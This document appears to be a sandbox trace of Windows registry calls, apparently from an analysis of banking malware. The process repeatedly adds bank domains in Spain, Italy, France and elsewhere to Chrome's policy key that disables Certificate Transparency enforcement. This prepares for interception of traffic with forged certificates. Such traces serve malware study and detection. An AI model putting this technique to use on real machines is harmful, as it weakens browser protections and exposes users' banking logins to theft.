	[0192.794] RegSetValueExA (in: hKey=0x47c, lpValueName="131", Reserved=0x0, dwType=0x1, lpData="nbnet.novobanco.es", cbData=0x12 | out: lpData="nbnet.novobanco.es") returned 0x0
	[0192.795] RegCloseKey (hKey=0x47c) returned 0x0
	[0192.796] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x478) returned 0x0
	[0192.796] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x480, lpdwDisposition=0x0) returned 0x0
	[0192.796] RegSetValueExA (in: hKey=0x480, lpValueName="132", Reserved=0x0, dwType=0x1, lpData="newentreprises.interepargne.natixis.com", cbData=0x27 | out: lpData="newentreprises.interepargne.natixis.com") returned 0x0
	[0192.797] RegCloseKey (hKey=0x480) returned 0x0
	[0192.797] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x47c) returned 0x0
	[0192.797] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x484, lpdwDisposition=0x0) returned 0x0
	[0192.798] RegSetValueExA (in: hKey=0x484, lpValueName="133", Reserved=0x0, dwType=0x1, lpData="cib.natixis.com", cbData=0xf | out: lpData="cib.natixis.com") returned 0x0
	[0192.799] RegCloseKey (hKey=0x484) returned 0x0
	[0192.799] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x480) returned 0x0
	[0192.799] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x488, lpdwDisposition=0x0) returned 0x0
	[0192.799] RegSetValueExA (in: hKey=0x488, lpValueName="134", Reserved=0x0, dwType=0x1, lpData="epargnants.interepargne.natixis.fr", cbData=0x22 | out: lpData="epargnants.interepargne.natixis.fr") returned 0x0
	[0192.801] RegCloseKey (hKey=0x488) returned 0x0
	[0192.801] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x484) returned 0x0
	[0192.801] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x48c, lpdwDisposition=0x0) returned 0x0
	[0192.801] RegSetValueExA (in: hKey=0x48c, lpValueName="135", Reserved=0x0, dwType=0x1, lpData="bancaelectronica.evobanco.com", cbData=0x1d | out: lpData="bancaelectronica.evobanco.com") returned 0x0
	[0192.803] RegCloseKey (hKey=0x48c) returned 0x0
	[0192.803] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x488) returned 0x0
	[0192.803] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x490, lpdwDisposition=0x0) returned 0x0
	[0192.803] RegSetValueExA (in: hKey=0x490, lpValueName="136", Reserved=0x0, dwType=0x1, lpData="be.abanca.com", cbData=0xd | out: lpData="be.abanca.com") returned 0x0
	[0192.804] RegCloseKey (hKey=0x490) returned 0x0
	[0192.805] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x48c) returned 0x0
	[0192.805] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x494, lpdwDisposition=0x0) returned 0x0
	[0192.805] RegSetValueExA (in: hKey=0x494, lpValueName="137", Reserved=0x0, dwType=0x1, lpData="mylo.lombardodier.com", cbData=0x15 | out: lpData="mylo.lombardodier.com") returned 0x0
	[0192.806] RegCloseKey (hKey=0x494) returned 0x0
	[0192.806] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x490) returned 0x0
	[0192.806] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x498, lpdwDisposition=0x0) returned 0x0
	[0192.806] RegSetValueExA (in: hKey=0x498, lpValueName="138", Reserved=0x0, dwType=0x1, lpData="cs1.credistar.com", cbData=0x11 | out: lpData="cs1.credistar.com") returned 0x0
	[0192.808] RegCloseKey (hKey=0x498) returned 0x0
	[0192.808] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x494) returned 0x0
	[0192.808] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x49c, lpdwDisposition=0x0) returned 0x0
	[0192.808] RegSetValueExA (in: hKey=0x49c, lpValueName="139", Reserved=0x0, dwType=0x1, lpData="www.eurocredito.es", cbData=0x12 | out: lpData="www.eurocredito.es") returned 0x0
	[0192.810] RegCloseKey (hKey=0x49c) returned 0x0
	[0192.810] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x498) returned 0x0
	[0192.810] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x4a0, lpdwDisposition=0x0) returned 0x0
	[0192.810] RegSetValueExA (in: hKey=0x4a0, lpValueName="140", Reserved=0x0, dwType=0x1, lpData="eurocredito.es", cbData=0xe | out: lpData="eurocredito.es") returned 0x0
	[0192.811] RegCloseKey (hKey=0x4a0) returned 0x0
	[0192.811] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x49c) returned 0x0
	[0192.812] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x4a4, lpdwDisposition=0x0) returned 0x0
	[0192.812] RegSetValueExA (in: hKey=0x4a4, lpValueName="141", Reserved=0x0, dwType=0x1, lpData="entreprises.retraite.assurances.natixis.com", cbData=0x2b | out: lpData="entreprises.retraite.assurances.natixis.com") returned 0x0
	[0192.813] RegCloseKey (hKey=0x4a4) returned 0x0
	[0192.813] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x4a0) returned 0x0
	[0192.814] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x4a8, lpdwDisposition=0x0) returned 0x0
	[0192.814] RegSetValueExA (in: hKey=0x4a8, lpValueName="142", Reserved=0x0, dwType=0x1, lpData="caixadirecta.colonya.es", cbData=0x17 | out: lpData="caixadirecta.colonya.es") returned 0x0
	[0192.815] RegCloseKey (hKey=0x4a8) returned 0x0
	[0192.815] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x4a4) returned 0x0
	[0192.815] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x4ac, lpdwDisposition=0x0) returned 0x0
	[0192.815] RegSetValueExA (in: hKey=0x4ac, lpValueName="143", Reserved=0x0, dwType=0x1, lpData="bancaporinternet.bancocaixageral.es", cbData=0x23 | out: lpData="bancaporinternet.bancocaixageral.es") returned 0x0
	[0192.817] RegCloseKey (hKey=0x4ac) returned 0x0
	[0192.817] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x4a8) returned 0x0
	[0192.817] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x4b0, lpdwDisposition=0x0) returned 0x0
	[0192.817] RegSetValueExA (in: hKey=0x4b0, lpValueName="144", Reserved=0x0, dwType=0x1, lpData="barclaysnet.barclays.es", cbData=0x17 | out: lpData="barclaysnet.barclays.es") returned 0x0
	[0192.819] RegCloseKey (hKey=0x4b0) returned 0x0
	[0192.819] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x4ac) returned 0x0
	[0192.819] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x4b4, lpdwDisposition=0x0) returned 0x0
	[0192.819] RegSetValueExA (in: hKey=0x4b4, lpValueName="145", Reserved=0x0, dwType=0x1, lpData="www.bsfincomonline.com", cbData=0x16 | out: lpData="www.bsfincomonline.com") returned 0x0
	[0192.820] RegCloseKey (hKey=0x4b4) returned 0x0
	[0192.820] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x4b0) returned 0x0
	[0192.821] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x4b8, lpdwDisposition=0x0) returned 0x0
	[0192.821] RegSetValueExA (in: hKey=0x4b8, lpValueName="146", Reserved=0x0, dwType=0x1, lpData="bsfincomonline.com", cbData=0x12 | out: lpData="bsfincomonline.com") returned 0x0
	[0192.822] RegCloseKey (hKey=0x4b8) returned 0x0
	[0192.822] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x4b4) returned 0x0
	[0192.822] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x4bc, lpdwDisposition=0x0) returned 0x0
	[0192.822] RegSetValueExA (in: hKey=0x4bc, lpValueName="147", Reserved=0x0, dwType=0x1, lpData="bsi.ar-ent.net", cbData=0xe | out: lpData="bsi.ar-ent.net") returned 0x0
	[0192.824] RegCloseKey (hKey=0x4bc) returned 0x0
	[0192.824] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x4b8) returned 0x0
	[0192.824] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x4c0, lpdwDisposition=0x0) returned 0x0
	[0192.824] RegSetValueExA (in: hKey=0x4c0, lpValueName="148", Reserved=0x0, dwType=0x1, lpData="www.carife.it", cbData=0xd | out: lpData="www.carife.it") returned 0x0
	[0192.826] RegCloseKey (hKey=0x4c0) returned 0x0
	[0192.826] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x4bc) returned 0x0
	[0192.826] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x4c4, lpdwDisposition=0x0) returned 0x0
	[0192.826] RegSetValueExA (in: hKey=0x4c4, lpValueName="149", Reserved=0x0, dwType=0x1, lpData="carife.it", cbData=0x9 | out: lpData="carife.it") returned 0x0
	[0192.827] RegCloseKey (hKey=0x4c4) returned 0x0
	[0192.827] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x4c0) returned 0x0
	[0192.828] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x4c8, lpdwDisposition=0x0) returned 0x0
	[0192.828] RegSetValueExA (in: hKey=0x4c8, lpValueName="150", Reserved=0x0, dwType=0x1, lpData="www.bancacrasti.it", cbData=0x12 | out: lpData="www.bancacrasti.it") returned 0x0
	[0192.829] RegCloseKey (hKey=0x4c8) returned 0x0
	[0192.829] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x4c4) returned 0x0
	[0192.829] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x4cc, lpdwDisposition=0x0) returned 0x0
	[0192.829] RegSetValueExA (in: hKey=0x4cc, lpValueName="151", Reserved=0x0, dwType=0x1, lpData="bancacrasti.it", cbData=0xe | out: lpData="bancacrasti.it") returned 0x0
	[0192.831] RegCloseKey (hKey=0x4cc) returned 0x0
	[0192.831] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x4c8) returned 0x0
	[0192.831] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x4d0, lpdwDisposition=0x0) returned 0x0
	[0192.831] RegSetValueExA (in: hKey=0x4d0, lpValueName="152", Reserved=0x0, dwType=0x1, lpData="www.biverbanca.it", cbData=0x11 | out: lpData="www.biverbanca.it") returned 0x0
	[0192.832] RegCloseKey (hKey=0x4d0) returned 0x0
	[0192.833] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x4cc) returned 0x0
	[0192.833] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x4d4, lpdwDisposition=0x0) returned 0x0
	[0192.833] RegSetValueExA (in: hKey=0x4d4, lpValueName="153", Reserved=0x0, dwType=0x1, lpData="biverbanca.it", cbData=0xd | out: lpData="biverbanca.it") returned 0x0
	[0192.834] RegCloseKey (hKey=0x4d4) returned 0x0
	[0192.834] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x4d0) returned 0x0
	[0192.834] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x4d8, lpdwDisposition=0x0) returned 0x0
	[0192.834] RegSetValueExA (in: hKey=0x4d8, lpValueName="154", Reserved=0x0, dwType=0x1, lpData="app.secservizi.it", cbData=0x11 | out: lpData="app.secservizi.it") returned 0x0
	[0192.836] RegCloseKey (hKey=0x4d8) returned 0x0
	[0192.836] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x4d4) returned 0x0
	[0192.836] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x4dc, lpdwDisposition=0x0) returned 0x0
	[0192.836] RegSetValueExA (in: hKey=0x4dc, lpValueName="155", Reserved=0x0, dwType=0x1, lpData="bebank.bpel.net", cbData=0xf | out: lpData="bebank.bpel.net") returned 0x0
	[0192.838] RegCloseKey (hKey=0x4dc) returned 0x0
	[0192.838] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x4d8) returned 0x0
	[0192.838] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x4e0, lpdwDisposition=0x0) returned 0x0
	[0192.838] RegSetValueExA (in: hKey=0x4e0, lpValueName="156", Reserved=0x0, dwType=0x1, lpData="ibbweb.tecmarket.it", cbData=0x13 | out: lpData="ibbweb.tecmarket.it") returned 0x0
	[0192.841] RegCloseKey (hKey=0x4e0) returned 0x0
	[0192.841] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x4dc) returned 0x0
	[0192.841] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x4e4, lpdwDisposition=0x0) returned 0x0
	[0192.841] RegSetValueExA (in: hKey=0x4e4, lpValueName="157", Reserved=0x0, dwType=0x1, lpData="tesoreriaonline.bper.it", cbData=0x17 | out: lpData="tesoreriaonline.bper.it") returned 0x0
	[0192.842] RegCloseKey (hKey=0x4e4) returned 0x0
	[0192.843] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x4e0) returned 0x0
	[0192.843] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x4e8, lpdwDisposition=0x0) returned 0x0
	[0192.843] RegSetValueExA (in: hKey=0x4e8, lpValueName="158", Reserved=0x0, dwType=0x1, lpData="youwebcard.bancopopolare.it", cbData=0x1b | out: lpData="youwebcard.bancopopolare.it") returned 0x0
	[0192.844] RegCloseKey (hKey=0x4e8) returned 0x0
	[0192.844] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x4e4) returned 0x0
	[0192.844] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x4ec, lpdwDisposition=0x0) returned 0x0
	[0192.845] RegSetValueExA (in: hKey=0x4ec, lpValueName="159", Reserved=0x0, dwType=0x1, lpData="bywebcard.bancopopolare.it", cbData=0x1a | out: lpData="bywebcard.bancopopolare.it") returned 0x0
	[0192.846] RegCloseKey (hKey=0x4ec) returned 0x0
	[0192.846] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x4e8) returned 0x0
	[0192.846] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x4f0, lpdwDisposition=0x0) returned 0x0
	[0192.846] RegSetValueExA (in: hKey=0x4f0, lpValueName="160", Reserved=0x0, dwType=0x1, lpData="www.bpmbanking.it", cbData=0x11 | out: lpData="www.bpmbanking.it") returned 0x0
	[0192.848] RegCloseKey (hKey=0x4f0) returned 0x0
	[0192.848] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x4ec) returned 0x0
	[0192.848] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x4f4, lpdwDisposition=0x0) returned 0x0
	[0192.848] RegSetValueExA (in: hKey=0x4f4, lpValueName="161", Reserved=0x0, dwType=0x1, lpData="bpmbanking.it", cbData=0xd | out: lpData="bpmbanking.it") returned 0x0
	[0192.850] RegCloseKey (hKey=0x4f4) returned 0x0
	[0192.850] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x4f0) returned 0x0
	[0192.850] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x4f8, lpdwDisposition=0x0) returned 0x0
	[0192.850] RegSetValueExA (in: hKey=0x4f8, lpValueName="162", Reserved=0x0, dwType=0x1, lpData="telemacoweb.credem.it", cbData=0x15 | out: lpData="telemacoweb.credem.it") returned 0x0
	[0192.851] RegCloseKey (hKey=0x4f8) returned 0x0
	[0192.852] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x4f4) returned 0x0
	[0192.852] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x4fc, lpdwDisposition=0x0) returned 0x0
